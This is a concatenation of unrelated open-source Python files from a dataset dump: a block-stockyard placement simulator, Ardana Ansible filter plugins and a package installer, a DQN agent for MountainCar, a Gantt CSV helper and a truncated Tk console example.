if isinstance(events[0], datetime.date):
self.TIMETYPE = datetime.date
else :
self.TIMETYPE = int
events = list(set(events))
events.sort()
self.EVENTS = events
self._blocks=blocks
self.event_in=event_in
self.event_out=event_out
    # Place a block by coordinates and compute the reward
def update_status(self, stage):
        if stage != 0:  # reflect blocks taken out between arrival events in the state
self._transfer_blocks(stage)
block=self._blocks[stage]
r=0
block.isin = True
width, height = block.get_dimension()
xloc, yloc = block.get_location()
bounds = self._make_boundary([xloc, yloc], [width, height])
for bound in bounds:
if self.status[bound[0], bound[1]] == 1:
r += 1
for i in range(width):
for j in range(height):
if (xloc + i < self.status.shape[0] and yloc + j < self.status.shape[1]):
self.status[xloc + i, yloc + j] += 1.0
else:
if (i == 0):
yloc += -1
self.status[xloc + i, yloc + j] += 1.0
else:
xloc += -1
self.status[xloc + i, yloc + j] += 1.0
self.RESULTS.append(deepcopy(self.status))
arrangible = True
for a in np.nditer(self.status):
if (a > 1):
arrangible = False
r=0
break
return arrangible, r
    # Place a block by lot and compute the reward
def update_state_lot(self, stage):
#state = deepcopy(self.get_status(max(0, stage - 1)))
state = np.full((self.width, self.height), -1.0, dtype=float)
current_day = self.event_in[stage]
        isdate = self.TIMETYPE is datetime.date  # set unconditionally; the commented-out branch below reads it
        if stage != 0:  # reflect blocks taken out between arrivals; update remaining days of placed blocks
#self._transfer_blocks(stage)
'''
term = self.event_in[stage]-self.event_in[stage-1]
if isdate:
term = float(term.days)
for i in range(state.shape[0]):
for j in range(state.shape[1]):
if state[i, j] == 0.0:
state[i, j] = -1.0
elif state[i, j] != -1.0:
state[i, j] -= term
if state[i, j] <= 0.0:
state[i, j] = -1.0
'''
blocks = self.get_blocks()
for i in range(stage):
_block = blocks[i]
_start, _end = _block.get_schedule()
if _start <= current_day < _end:
_x, _y = _block.get_location()
state[_x, _y] = (_end - current_day).days
block = self._blocks[stage]
start, end = block.get_schedule()
untilout = block.term
r=0
block.isin = True
width, height = block.get_dimension()
xloc, yloc = block.get_location()
if state[xloc, yloc] != -1.0:
arrangible=False
state[xloc, yloc] = -2.0
else:
state[xloc, yloc] += untilout+1
arrangible = True
'''
exitside, otherside = self.separate_area(self.status, [xloc, yloc], 1)
for lot in exitside:
if lot<untilout:
r+=1
elif lot>untilout:
r+=-1
for lot in otherside:
if lot<untilout:
r+=-1
elif lot>untilout:
r+=1
'''
        # Scale the reward so it becomes one of 1, 0, -1
if r > 0:
#r = int(r/4)+1
r=1
elif r < 0:
#r = int(r/4)-1
r=-1
        # reward removed from RESULTS
#self.RESULTS.append([deepcopy(self.status), r])
#temp = np.zeros(self.status.shape)
#np.copyto(temp, self.status)
self.RESULTS.append(state)
return arrangible, r
    # Split the space at location into the exit-facing area (exit in 0,1,2,3) and the opposite area
def separate_area(self, state, location=[0,0], exit=0):
        # Rotate state and location according to the exit direction
if exit==1:
location = [location[1], state.shape[0]-location[0]-1]
elif exit==2:
location = [state.shape[0]-location[0]-1, state.shape[1]-location[1]-1]
elif exit==3:
location = [state.shape[1] - location[1]-1, location[0]]
state = np.rot90(state, -exit)
exitside=[]
otherside=[]
for i in range(state.shape[0]):
for j in range(state.shape[1]):
if state[i,j] != -1 and j != location[1]:
if j<location[1]:
exitside.append(state[i,j])
else:
otherside.append(state[i,j])
return exitside, otherside
    # Handle take-out events that fall after the previous stage and before the current one
def _transfer_blocks(self, stage):
for day, block in self.event_out:
if day>self.event_in[stage-1] and day<=self.event_in[stage]:
width, height = block.get_dimension()
xloc, yloc = block.get_location()
for i in range(width):
for j in range(height):
if (xloc + i < self.status.shape[0] and yloc + j < self.status.shape[1]):
self.status[xloc + i, yloc + j] = 0.0
else:
if (i == 0):
yloc += -1
self.status[xloc + i, yloc + j] = 0.0
else:
xloc += -1
self.status[xloc + i, yloc + j] = 0.0
#self.RESULTS.append([deepcopy(self.status), 0])
def set_status(self, date):
self.CURRENTDATE = date
status = np.full((self.status.shape[0], self.status.shape[1]), .0, dtype=float)
#status=self.status
for block in self._blocks:
startdate, enddate = block.get_schedule()
if (date >= startdate and date < enddate):
width, height = block.get_dimension()
xloc, yloc = block.get_location()
for i in range(width):
for j in range(height):
if (yloc + j < status.shape[0] and xloc + i < status.shape[1]):
status[yloc + j, xloc + i] += 1.0
else:
if (j == 0):
xloc += -1
status[yloc + j, xloc + i] += 1.0
else:
yloc += -1
status[yloc + j, xloc + i] += 1.0
self.RESULTS.append(status)
arrangible = True
for a in np.nditer(status):
if (a > 1):
arrangible = False
break
return arrangible
def get_status(self, stage):
'''
day=self.event_in[stage]
if (day >= self.EVENTS[-1]):
return self.RESULTS[-1]
for i in range(len(self.EVENTS)-1):
if(self.EVENTS[i]<=day and self.EVENTS[i+1]>day):
index=i
break
if(len(self.RESULTS)==0):
status=np.full((self.width, self.height), -1.0, dtype=float)
else:
if(len(self.RESULTS)<=index):
print('here')
status=self.RESULTS[index]
'''
if (len(self.RESULTS) == 0):
status = np.full((self.width, self.height), -1.0, dtype=float)
else:
status = self.RESULTS[stage]
return status
def get_blocks(self):
return self._blocks
def _make_boundary(self, location, size):
bounds=[]
if location[1] != 0:
for i in range(size[0]):
if location[0] + i< self.width:
bounds.append([location[0]+i, location[1]-1])
if location[0] + size[0] < self.width:
for i in range(size[1]):
if location[1] + i <self.height:
bounds.append([location[0] + size[0], location[1]+i])
if location[1] + size[1] < self.height:
for i in range(size[0]):
if location[0] + i < self.width:
bounds.append([location[0]+i, location[1] + size[1]])
if location[0] != 0:
for i in range(size[1]):
if location[1] + i < self.height:
bounds.append([location[0]-1, location[1]+i])
return bounds
def modify_latest_state(self, new_state):
if len(self.RESULTS) > 0:
self.RESULTS[-1] = new_state
```
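`_make_boundary` collects the ring of cells around a block's footprint, clipped to the yard edges; `update_status` then counts how many of those cells are already occupied to score adjacency. A standalone sketch of the same ring computation (assumed semantics):
```python
def boundary(location, size, width, height):
    """Cells adjacent to a size[0] x size[1] block at location, inside the yard."""
    x0, y0 = location
    w, h = size
    cells = []
    for i in range(w):  # cells above and below the footprint
        if 0 <= x0 + i < width:
            if y0 - 1 >= 0:
                cells.append([x0 + i, y0 - 1])
            if y0 + h < height:
                cells.append([x0 + i, y0 + h])
    for j in range(h):  # cells left and right of the footprint
        if 0 <= y0 + j < height:
            if x0 - 1 >= 0:
                cells.append([x0 - 1, y0 + j])
            if x0 + w < width:
                cells.append([x0 + w, y0 + j])
    return cells
print(boundary([0, 0], [2, 1], width=4, height=3))  # [[0, 1], [1, 1], [2, 0]]
```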
#### File: Block_Stockyard/view/ArrayView.py
```python
import matplotlib.pyplot as plt
import numpy as np
import simulater.DataManager as dm
def visualize_space(Statuses):
Days=range(len(Statuses))
fig = plt.figure(figsize=(10, 5))
for i in range(len(Statuses)):
        ax = fig.add_subplot(1, len(Statuses) + 1, i + 1)  # integer arguments; float division breaks on Python 3
#_label=Names[i]+'('+str(Labels[i])+')'
ax.set_title(Days[i], fontsize='20', x=0.5, y=1.0)
plt.imshow(Statuses[i], vmin=0, vmax=1)
#plt.figimage(Statuses[i])
ax.axes.get_xaxis().set_visible(False)
ax.axes.get_yaxis().set_visible(False)
#ax.set_aspect('equal')
    # Color reference axis
'''
cax = fig.add_axes([0.12, 0.1, 0.95, 0.8])
cax.get_xaxis().set_visible(False)
cax.get_yaxis().set_visible(False)
#cax.patch.set_alpha(1)
cax.set_frame_on(False)
'''
#plt.colorbar(orientation='vertical')
plt.show()
def visualize_log(logs, cumulate):
max_logs = 1
num_logs = len(logs)
num_status = len(logs[0]) - 1
'''
cumulate = np.zeros([logs[0][0][0].shape[0], logs[0][0][0].shape[1]])
for i in range(num_logs):
for j in range(num_status):
cumulate += logs[i][j][0]
'''
if num_logs>max_logs:
num_logs=max_logs
logs=logs[0:max_logs]
fig = plt.figure(figsize=(15, 15))
for i in range(num_logs):
for j in range(num_status):
#ax = fig.add_subplot(num_logs, num_status, num_status*i+j+1)
            ax = fig.add_subplot(max_logs*5, num_status//5, 50*i+j + 1)  # integer division for the subplot grid
#_label=Names[i]+'('+str(Labels[i])+')'
ax.set_title(str(logs[i][j][1]), fontsize='7', x=0.5, y=0.88)
plt.imshow(logs[i][j][0], vmin=-1, vmax=logs[i][j][0].max())
#plt.figimage(Statuses[i])
ax.axes.get_xaxis().set_visible(False)
ax.axes.get_yaxis().set_visible(False)
fig.savefig('../data/arrangement.png')
dm.export_2darray_csv(cumulate, '../data/result.csv')
print ('Reward of arrangement: ' + str(logs[0][-1]))
#ax.set_aspect('equal')
    # Color reference axis
'''
cax = fig.add_axes([0.12, 0.1, 0.95, 0.8])
cax.get_xaxis().set_visible(False)
cax.get_yaxis().set_visible(False)
#cax.patch.set_alpha(1)
cax.set_frame_on(False)
'''
#plt.colorbar(orientation='vertical')
plt.show()
``` |
{
"source": "jjolly/ardana-dev-tools",
"score": 2
} |
#### File: ansible/filter_plugins/collection_filters.py
```python
import itertools
from functools import reduce  # reduce is not a builtin on Python 3
import jinja2.runtime as jrt
def do_flatten(lists):
"""Flatten multiple lists
Takes a list of lists and returns a single list of the contents.
"""
for item in itertools.chain.from_iterable(lists):
yield item
def do_reduce(collection, *args, **kwargs):
"""Extract multi-level attributes from collection
Return a generator of the results from the given attributes in the
provided collection.
So for multiple dictionaries such as:
collection = [
{'attr': {'data': 1}},
{'attr': {'data': 2}},
{'attr': {'data': 3}}
}
so `do_reduce(collection, 'attr', 'data')` yields `1, 2, 3`
"""
default = kwargs.get('d', jrt.StrictUndefined())
default = kwargs.get('default', default)
for item in collection:
try:
yield reduce(type(item).__getitem__, args, item)
except (KeyError, TypeError):
if not isinstance(default, jrt.StrictUndefined):
yield default
def do_collect(collection, needles):
for item in needles:
try:
yield collection[item]
except KeyError:
pass
class FilterModule(object):
def filters(self):
return {'flatten': do_flatten,
'collect': do_collect,
'reduce': do_reduce}
```
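In a template these filters chain: `reduce` digs an attribute path out of each item and `flatten` merges lists of lists, e.g. something like `{{ hosts | reduce('attr', 'data') | list }}` (template usage shown as an assumption). Called directly from Python in the same module, the behavior looks like this:
```python
collection = [{'attr': {'data': 1}},
              {'attr': {'data': 2}},
              {'attr': {'other': 3}}]
print(list(do_reduce(collection, 'attr', 'data', default=0)))  # [1, 2, 0]
print(list(do_flatten([[1, 2], [3]])))                         # [1, 2, 3]
```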
#### File: ansible/filter_plugins/extract_dicts_filter.py
```python
def extract_dicts(data):
output = {}
for value in data:
if type(value) is dict:
output.update(value)
return output
class FilterModule(object):
def filters(self):
return {'extract_dicts': extract_dicts}
```
#### File: ansible/filter_plugins/find_deps_filter.py
```python
def find_deps(services):
output = set()
for service in services.values():
for dep in service.get("deps", []):
output.add(dep)
return list(output)
class FilterModule(object):
def filters(self):
return {'find_deps': find_deps}
```
#### File: ansible/filter_plugins/version_compare_smart.py
```python
import operator as py_operator
import pkg_resources
from ansible import errors
def version_compare_smart(value, version, operator='eq'):
'''Perform a version comparison on a value'''
op_map = {
'==': 'eq', '=': 'eq', 'eq': 'eq',
'<': 'lt', 'lt': 'lt',
'<=': 'le', 'le': 'le',
'>': 'gt', 'gt': 'gt',
'>=': 'ge', 'ge': 'ge',
'!=': 'ne', '<>': 'ne', 'ne': 'ne'
}
if operator in op_map:
operator = op_map[operator]
else:
raise errors.AnsibleFilterError('Invalid operator type')
try:
method = getattr(py_operator, operator)
return method(pkg_resources.parse_version(value),
pkg_resources.parse_version(version))
except Exception as e:
raise errors.AnsibleFilterError('Version comparison: %s' % e)
class FilterModule(object):
def filters(self):
return {
"version_compare_smart": version_compare_smart
}
```
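The point of `pkg_resources.parse_version` is correct numeric segment ordering: '1.10.0' sorts after '1.9.0', which a plain string comparison gets wrong. A usage sketch, assuming the module above is importable:
```python
print(version_compare_smart('1.10.0', '1.9.0', '>'))  # True
print(version_compare_smart('2.0.0', '2.0.0', 'eq'))  # True
print('1.10.0' > '1.9.0')  # False -- why string comparison is not enough
```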
#### File: packager/ardana_packager/cmd.py
```python
import json
import six
import sys
import ardana_packager.activate as activate
import ardana_packager.ansible as ansible
import ardana_packager.cache as cache
import ardana_packager.config as config
from ardana_packager.error import InstallerError
import ardana_packager.expand as expand
import ardana_packager.service as service
from ardana_packager.version import Spec
def main():
# This must be called from a module with WANT_JSON specified
with open(sys.argv[1]) as f:
params = {'state': None,
'name': None,
'group': 'root',
'extra_mode_bits': '000',
'service': None,
'version': config.VERSION_LATEST,
'suffix': None,
'cache': None,
'clean': False,
'activate': None,
}
params.update(json.load(f))
# We make an "empty" module as the ansible module doesn't
# have bare fail_json, etc, functions.
module = ansible.AnsibleModule(argument_spec={}, args=[])
state = params['state']
assert state in ('present', 'absent', None)
name = params['name']
group_name = params['group']
extra_mode_bits = int(params['extra_mode_bits'], 8)
service_name = params['service']
version = params['version']
suffix = params['suffix']
cache_op = params['cache']
assert cache_op in ('update', None)
clean = params['clean']
activate = params['activate']
assert activate in ('act_on', 'act_off', None)
# Backward-compatible argument munging: sometimes "version"
# really means "suffix".
if isinstance(version, dict):
assert version['v'] == 1
if suffix is None:
suffix = version['suffix']
version = version['version']
elif activate == 'act_on' and state is None:
if suffix is None and isinstance(version, six.string_types):
# Use the suffix
suffix = version
version = None
if activate is None:
activate = 'act_on'
spec = Spec(package=name, service=service_name,
version=version, suffix=suffix)
conf = config.Config(group_name=group_name,
extra_mode_bits=extra_mode_bits)
# For the moment ...
# TODO(jan) break this out into a class that can control it all.
changed = False
if cache_op == "update":
try:
changed = cache.update(conf) or changed
except Exception as e:
module.fail_json(msg="Installation failed",
name=name,
group=group_name,
extra_mode_bits=extra_mode_bits,
service=service_name,
version=_report_version(version),
exception=str(e))
return
elif state == "present":
try:
(changed_ret, spec) = install(spec, conf)
changed = changed or changed_ret
except InstallerError as e:
module.fail_json(msg="Installation failed",
name=name,
group=group_name,
extra_mode_bits=extra_mode_bits,
service=service_name,
version=_report_version(spec.version),
exception=str(e))
return
elif state == "absent":
try:
(changed_ret, spec) = uninstall(spec, conf)
changed = changed or changed_ret
except InstallerError as e:
module.fail_json(msg="Installation failed",
name=name,
service=service_name,
version=str(spec.version),
exception=str(e))
return
if clean:
# TODO(jang)
pass
# activate defaults to act_on but if we are removing package then
# we can't activate it
if state != 'absent' and activate == "act_on" \
and name is not None and service_name is not None:
try:
(changed_ret, version) = activate_install(spec, conf)
except InstallerError as e:
module.fail_json(msg="Activation failed",
name=name,
service=service_name,
version=str(spec.version),
exception=str(e))
return
version = _report_version(spec.version)
try:
suffix = spec.suffix
except AttributeError:
suffix = None
_version = {'version': version,
'suffix': spec.suffix if hasattr(spec, 'suffix') else suffix,
'v': 1,
}
module.exit_json(state=state, name=name, group=group_name,
extra_mode_bits=extra_mode_bits, service=service_name,
package_version=str(spec.version), suffix=suffix,
# version should be deprecated - replace
# with package_version or suffix
version=_version,
cache=cache_op, clean=clean,
changed=changed)
def _report_version(version):
if version is cache.VERSION_LATEST:
return None
return str(version)
def install(spec, conf):
(changed, spec) = expand.explode(conf, spec)
changed = service.refer(conf, spec) or changed
current_version = activate.active_version(conf.SERVICE_LOCATION, spec)
changed = service.refer(conf, spec) or changed
if current_version == spec.version:
changed = False
return (changed, spec)
def uninstall(spec, conf):
changed = False
current_version = activate.active_version(conf.SERVICE_LOCATION, spec)
if current_version is not None and (spec.version is config.VERSION_LATEST
or current_version == spec.version):
spec.version = current_version
activate.deactivate(conf.SERVICE_LOCATION, spec)
changed = True
changed = service.remove(conf, spec) or changed
if not service.count_refs(conf, spec):
changed = expand.remove(conf, spec) or changed
return (changed, spec)
def activate_install(spec, conf):
current_version = activate.active_version(conf.SERVICE_LOCATION, spec)
if current_version == spec.version:
return (False, spec)
if current_version is not None:
activate.deactivate(conf.SERVICE_LOCATION,
Spec(package=spec.package, service=spec.service,
version=current_version))
# Leaving removal of service venv until separate cleanup phase
# service.remove(conf, spec, current_version)
activate.activate(conf.SERVICE_LOCATION, spec)
# TODO(howleyt): should we differentiate between new vs. old version?
return (True, spec)
```
#### File: packager/ardana_packager/expand.py
```python
import grp
import os
import os.path
import shutil
import tarfile
from ardana_packager.activate import active_version
import ardana_packager.cache as cache
from ardana_packager.error import InstallerError
def package_dir(config, spec):
return os.path.join(config.VENV_LOCATION, spec.package + "-" + spec.suffix)
def explode(config, spec):
"""Take the package installed in cache_dir and expand it.
This will be a no-op if there's already something
at the target.
We require the source package to be present in
the cache_dir, with the name
$(basename $location)-suffix.tgz
Returns (True, spec) if it modified the filesystem.
"""
spec = cache.assert_package_present(config, spec)
cache_file = cache.cache_file(config, spec)
target_dir = package_dir(config, spec)
if not os.path.isfile(cache_file):
raise InstallerError(
"{cache_file} not found"
.format(cache_file=cache_file))
if not tarfile.is_tarfile(cache_file):
raise InstallerError(
"{cache_file} is not in the correct format"
.format(cache_file=cache_file))
if os.path.isdir(target_dir):
# We assume there's nothing to do
return (False, spec)
if os.path.exists(target_dir):
raise InstallerError(
"{target_dir} already exists"
.format(target_dir=target_dir))
try:
os.mkdir(target_dir, 0o755)
gname = config['group_name']
group = grp.getgrnam(gname)
gid = group.gr_gid
with tarfile.open(cache_file) as tar:
members = tar.getmembers()
for m in members:
m.uid = 0
m.gid = gid
m.uname = 'root'
m.gname = gname
m.mode |= config['extra_mode_bits']
tar.extractall(path=target_dir, members=members)
except Exception as e:
raise InstallerError(
"{cache_file} could not be exploded to {target_dir}"
.format(cache_file=cache_file, target_dir=target_dir), e)
return (True, spec)
def remove(config, spec):
"""Remove an exploded version
This is an error if the version's currently activated.
There's no error if the version is already not there.
Returns True if it modified the filesystem
"""
location = os.path.join(config.VENV_LOCATION, spec.package)
current_version = active_version(config.VENV_LOCATION, spec)
if current_version == spec.version:
raise InstallerError(
"Cannot remove {version} for {location} since it is current active"
.format(location=location, version=spec.version))
target = location + "-" + spec.suffix
if not os.path.exists(target):
return False
if not os.path.isdir(target):
msg = ("Cannot remove {version} for {location} since it is not"
" a directory".format(location=location, version=spec.version))
raise InstallerError(msg)
try:
# Delete recursively
shutil.rmtree(target)
except Exception as e:
raise InstallerError(
"Could not delete {target}"
.format(target=target), e)
return True
```
#### File: packager/ardana_packager/version.py
```python
import os.path
import tarfile
import yaml
from ardana_packager.config import DIR_FORMAT, TAR_FORMAT, VERSION_LATEST # noqa
from ardana_packager.error import InstallerError
class Version(object):
def __init__(self, parts=None):
if parts is None:
parts = [[0]]
self._parts = parts
def __eq__(self, other):
return other is not None and self._parts == other._parts
def __ne__(self, other):
return other is None or self._parts != other._parts
def __le__(self, other):
return self._parts <= other._parts
def __lt__(self, other):
return self._parts < other._parts
def __ge__(self, other):
return self._parts >= other._parts
def __gt__(self, other):
return self._parts > other._parts
def __str__(self):
return ':'.join('.'.join(str(n) for n in p) for p in self._parts)
def from_str(s):
"""Given a plain string version, return the Version object"""
return Version(
[[int(n) if n.isdigit() else n for n in p.split('.')]
for p in s.split(':')])
with open(os.path.join(os.path.dirname(__file__), 'versions.yml')) as f:
_BEST_GUESS = yaml.safe_load(f)
def best_guess(s):
try:
return _BEST_GUESS[s]
except KeyError:
if ":" in s:
return s
else:
return "2.0.0:" + s
def from_tarball(fn):
"""Given a tarball path, extract Version from META-INF/version.yml.
If that file does not exist, use your best guess from the
suffix (which *must* work).
"""
with tarfile.open(fn) as tf:
version_file = os.path.join('.',
'META-INF',
'version.yml')
try:
f = tf.extractfile(version_file)
if f is not None:
version_metadata = yaml.safe_load(f)
version_string = (str(version_metadata['version']) + ":" +
str(version_metadata['timestamp']))
if 'patch' in version_metadata:
version_string += ":" + str(version_metadata['patch'])
return from_str(version_string)
except KeyError:
pass
# Guess from the suffix
return guess_from_suffix(fn, TAR_FORMAT)
def guess_from_suffix(file_name, format, group=2):
"""Return a best guess, given a directory or tarball name"""
file = os.path.basename(file_name)
match = format.match(file)
if not match:
raise InstallerError(
"{} doesn't have a viable suffix".format(file_name))
version = match.group(group)
# The suffix is from an older ISO image
guess = best_guess(version)
if guess == version:
raise InstallerError("{} has an unknown suffix".format(file_name))
return from_str(guess)
def from_dir(dir):
"""Given a directory, look in dir/META-INF/version.yml.
If that's not there, guess from the suffix.
"""
version_file = os.path.join(dir, 'META-INF', 'version.yml')
if os.path.exists(version_file):
with open(version_file) as f:
version_metadata = yaml.safe_load(f)
version_string = (str(version_metadata['version']) + ":" +
str(version_metadata['timestamp']))
if 'patch' in version_metadata:
version_string += ":" + str(version_metadata['patch'])
return from_str(version_string)
# Guess from the suffix
return guess_from_suffix(dir, DIR_FORMAT)
def from_service_dir(dir):
"""Given a directory, look in dir/venv/META-INF/version.yml.
Otherwise, guess from the suffix.
"""
version_file = os.path.join(dir, 'venv', 'META-INF', 'version.yml')
if os.path.exists(version_file):
with open(version_file) as f:
version_metadata = yaml.safe_load(f)
version_string = (str(version_metadata['version']) + ":" +
str(version_metadata['timestamp']))
if 'patch' in version_metadata:
version_string += ":" + str(version_metadata['patch'])
return from_str(version_string)
# Guess from the suffix
return guess_from_suffix(dir, DIR_FORMAT)
class Spec(object):
"""Package and Service version specifier.
    A specifier: this is a potential five-tuple,
with a package name (eg, "nova"), a directory
suffix (eg, "20160101T120000Z"), a Version object
(which may be specified as a string on creation),
a cache filename (sans cache directory),
and a service name (eg, "nova-api").
"""
def __init__(self, package=None, service=None,
suffix=None, version=None, tarball=None):
# Only initialise attributes if they're given;
# we catch missing ones this way.
if package is not None:
self.package = package
if service is not None:
self.service = service
if suffix is not None:
self.suffix = suffix
if isinstance(version, Version):
self.version = version
elif version is VERSION_LATEST:
self.version = version
elif version is not None:
self.version = from_str(version)
if tarball is not None:
self.tarball = tarball
def test():
v1 = Version([[3, 0, 0], ['20160501T120000Z']])
assert str(v1) == '3.0.0:20160501T120000Z'
v2 = from_str('3.0.0:20160501T120000Z')
assert v1 == v2
if __name__ == '__main__':
test()
```
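A minimal sketch of the comparison semantics `Version`/`from_str` implement above, assuming the `ardana_packager` package is importable; the version strings are illustrative:
```python
# Sketch only: exercises the ordering rules of Version as defined above.
from ardana_packager.version import Version, from_str

old = from_str("2.0.0:20160101T120000Z")
new = from_str("3.0.0:20160501T120000Z")
patched = from_str("3.0.0:20160501T120000Z:1")

assert old < new          # numeric parts compare first: [2, 0, 0] < [3, 0, 0]
assert new < patched      # an extra patch component sorts after the base version
assert str(new) == "3.0.0:20160501T120000Z"
# Versions built from raw parts equal their parsed counterparts.
assert Version([[3, 0, 0], ["20160501T120000Z"]]) == new
```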
#### File: ardana-dev-tools/tests/test_filter_collections_plugin.py
```python
from oslotest import base
import tests.filters_base # noqa
from collection_filters import do_collect
from collection_filters import do_flatten
from collection_filters import do_reduce
class FlattenTests(base.BaseTestCase):
def test_simple(self):
list1 = [{'ab': {'ac': 1}},
{'bb': {'bc': 2}}]
list2 = [{'cb': {'cc': 3}}]
flatlist = [
{'ab': {'ac': 1}},
{'bb': {'bc': 2}},
{'cb': {'cc': 3}}
]
self.assertEqual(list(do_flatten([list1, list2])), flatlist)
class ReduceTests(base.BaseTestCase):
def test_simple(self):
collection = [
{'a': {'b': 1}},
{'a': {'b': 2}},
{'a': {'b': 3}}
]
self.assertEqual(list(do_reduce(collection, 'a', 'b')), [1, 2, 3])
self.assertEqual(list(do_reduce(collection, 'a', 'd')), [])
def test_defaults(self):
collection = [
{'a': {'b': 1}},
{'a': {'b': 2}},
{'a': {'c': 3}}
]
self.assertEqual(list(do_reduce(collection, 'a', 'b', default=99)),
[1, 2, 99])
self.assertEqual(list(do_reduce(collection, 'a', 'd', default=99)),
[99, 99, 99])
class CollectTests(base.BaseTestCase):
def test_simple(self):
collection = {
'a': {'ab': {'ac': 1}},
'b': {'bb': {'bc': 2}},
'c': {'cb': {'cc': 3}}
}
        self.assertCountEqual(   # assertItemsEqual under Python 2
            list(do_collect(collection, ['a', 'c'])),
            [v for k, v in collection.items() if k != 'b'])
        self.assertCountEqual(
            list(do_collect(collection, ['a', 'b', 'c'])),
            collection.values())
        self.assertCountEqual(
            list(do_collect(collection, ['a', 'b', 'c', 'd'])),
            collection.values())
``` |
{
"source": "JJonahJson/MountainCar-v313",
"score": 2
} |
#### File: MountainCar-v313/code/dqn_agent.py
```python
import numpy as np
import tensorflow as tf
from net_model import NetModel
from training_mode import TrainingMode
class DQNAgent:
def __init__(self, num_states, num_actions, hidden_units, gamma, max_experiences, min_experiences, batch_size, lr):
self.gamma = gamma
self.batch_size = batch_size
self.num_actions = num_actions
self.min_experiences = min_experiences
self.max_experiences = max_experiences
self.optimizer = tf.optimizers.Adam(lr)
self.model = NetModel(num_states, hidden_units, num_actions)
self.experience = {'s': [], 'a': [], 'r': [], 's2': [], 'done': []}
def predict(self, inputs):
return self.model(np.atleast_2d(inputs.astype('float32')))
def train(self, target_net, chosen_training):
if len(self.experience['s']) < self.min_experiences:
return 0
ids = np.random.randint(low=0, high=len(self.experience['s']), size=self.batch_size)
states = np.asarray([self.experience['s'][i] for i in ids])
actions = np.asarray([self.experience['a'][i] for i in ids])
rewards = np.asarray([self.experience['r'][i] for i in ids])
states_next = np.asarray([self.experience['s2'][i] for i in ids])
dones = np.asarray([self.experience['done'][i] for i in ids])
if chosen_training is TrainingMode.DoubleDQN:
values = np.array(target_net.predict(states_next))[range(self.batch_size), np.argmax(self.predict(states_next), axis=1)]
actual_values = np.where(dones, rewards, rewards + self.gamma * values)
else:
value_next = np.max(target_net.predict(states_next), axis=1)
actual_values = np.where(dones, rewards, rewards+self.gamma*value_next)
with tf.GradientTape() as tape:
selected_action_values = tf.math.reduce_sum(self.predict(states) * tf.one_hot(actions, self.num_actions), axis=1)
loss = tf.math.reduce_mean(tf.square(actual_values - selected_action_values))
variables = self.model.trainable_variables
gradients = tape.gradient(loss, variables)
self.optimizer.apply_gradients(zip(gradients, variables))
return loss
def get_action_epsilon_greedy(self, states, epsilon):
if np.random.random() < epsilon:
return np.random.choice(self.num_actions)
else:
return np.argmax(self.predict(np.atleast_2d(states))[0])
def add_experience(self, exp):
if len(self.experience['s']) >= self.max_experiences:
for key in self.experience.keys():
self.experience[key].pop(0)
for key, value in exp.items():
self.experience[key].append(value)
def copy_weights(self, train_net):
variables1 = self.model.trainable_variables
variables2 = train_net.model.trainable_variables
for v1, v2 in zip(variables1, variables2):
v1.assign(v2.numpy())
def soft_update_weights(self, train_net):
tau = 0.1
q_network_theta = train_net.model.get_weights()
target_network_theta = self.model.get_weights()
counter = 0
for q_weight, target_weight in zip(q_network_theta, target_network_theta):
target_weight = target_weight * (1 - tau) + q_weight * tau
target_network_theta[counter] = target_weight
counter += 1
self.model.set_weights(target_network_theta)
``` |
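A hedged sketch of how `DQNAgent` might be driven as a train/target pair, assuming the repo's `dqn_agent`/`training_mode` modules are importable and the classic `gym` API (4-tuple `step`); the hyperparameters are illustrative, not the repo's settings:
```python
# Sketch only: train/target DQN pair on MountainCar, classic gym API assumed.
import gym
from dqn_agent import DQNAgent
from training_mode import TrainingMode

env = gym.make("MountainCar-v0")
num_states = env.observation_space.shape[0]   # 2: position, velocity
num_actions = env.action_space.n              # 3: push left, idle, push right
make_agent = lambda: DQNAgent(num_states, num_actions, hidden_units=[64, 64],
                              gamma=0.99, max_experiences=10000,
                              min_experiences=100, batch_size=32, lr=1e-3)
train_net, target_net = make_agent(), make_agent()

obs = env.reset()
for step in range(1000):
    action = train_net.get_action_epsilon_greedy(obs, epsilon=0.1)
    next_obs, reward, done, _ = env.step(action)
    train_net.add_experience({'s': obs, 'a': action, 'r': reward,
                              's2': next_obs, 'done': done})
    train_net.train(target_net, TrainingMode.DoubleDQN)
    if step % 25 == 0:
        target_net.copy_weights(train_net)  # hard update; soft_update_weights is the soft variant
    obs = env.reset() if done else next_obs
```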
{
"source": "JJones4452/gantt-creator",
"score": 3
} |
#### File: JJones4452/gantt-creator/CreateGanttCsv.py
```python
import pandas as pd
import numpy as np
import re, sys, os
import locations as loc
sys.path.append(loc.utility_path)
import Utility
class CreateGanttCsv:
def __init__(self, directory: str) -> None:
self.directory: str = directory
def create_csv(self, filename: str, overwrite: bool):
        if not re.search(r"(\.\w+)", filename):  # raw string avoids invalid escape sequences
            filename += ".csv"
        if Utility.find(filename, self.directory) and not overwrite:
            return 0
        # values are lists of task names / numpy datetimes
        df_template: dict[str, list] = \
{
"Task" : [],
"Task Type" : [],
"Start Date" : [],
"End Date" : [],
"Completion Time" : []
}
my_frame = pd.DataFrame(df_template)
my_frame.to_csv(os.path.join(self.directory, filename), index=False)
# myobj = CreateGanttCsv(loc.gantt_directory)
# myobj.create_csv("Gantt_Start.csv", True)
``` |
{
"source": "jjongbloets/jules_tk",
"score": 2
} |
#### File: examples/console/console.py
```python
from julesTk import app, controller, view
from julesTk.utils.console import LogView
from julesTk.controller import poller
import logging
__author__ = "<NAME> <<EMAIL>>"
class LogApp(app.Application):
def __init__(self):
super(LogApp, self).__init__()
def _prepare(self):
self.root.title('Console')
self.root.geometry('500x500+200+200')
self.root.minsize(300, 300)
self.add_controller("main", MainController(self))
@property
def main(self):
return self.get_controller("main")
def _start(self):
self.main.start()
class MainView(view.View):
def _prepare(self):
self.pack(fill=view.tk.BOTH, expand=1)
self.grid_rowconfigure(0, weight=1)
self.grid_columnconfigure(0, weight=1)
frmb = view.ttk.Frame(self, relief=view.tk.RAISED, borderwidth=1)
frmb.grid(row=0, column=0, sticky="nsew")
self._prepare_body(frmb)
frmt = view.ttk.Frame(self, relief=view.tk.RAISED, borderwidth=1)
frmt.grid(row=1, column=0, sticky="ew")
self._prepare_tools(frmt)
def _prepare_body(self, parent=None):
if parent is None:
parent = self
log = LogView(parent)
self.add_widget("log", log)
log.pack(fill=view.tk.BOTH, expand=1)
def _prepare_tools(self, parent=None):
if parent is None:
parent = self
log = self.get_widget("log")
btn = view.ttk.Button(parent, text="Close", command=self.exit)
btn.pack(side=view.tk.RIGHT)
btc = view.ttk.Button(parent, text="Clear", command=log.clear)
